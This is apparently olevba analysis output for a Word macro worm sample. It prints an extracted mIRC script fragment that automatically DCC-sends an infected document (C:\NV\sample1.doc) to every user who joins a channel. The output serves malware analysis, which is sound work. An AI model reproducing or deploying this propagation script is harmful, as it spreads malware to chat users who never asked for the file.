olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Email-Worm.MSWord.ZWMVC-f26bce4ce6cfa883fab48c13b459ebe0d3b4ba12
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Email-Worm.MSWord.ZWMVC-f26bce4ce6cfa883fab48c13b459ebe0d3b4ba12 
in file: Email-Worm.MSWord.ZWMVC-f26bce4ce6cfa883fab48c13b459ebe0d3b4ba12 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[script]
n5= on 1:JOIN:#:{
n6= /if ( $nick == $me ) { halt }
n7= /msg $nick 
n8= /dcc send -c $nick C:\NV\sample1.doc
n9= }
No suspicious keyword or IOC found.

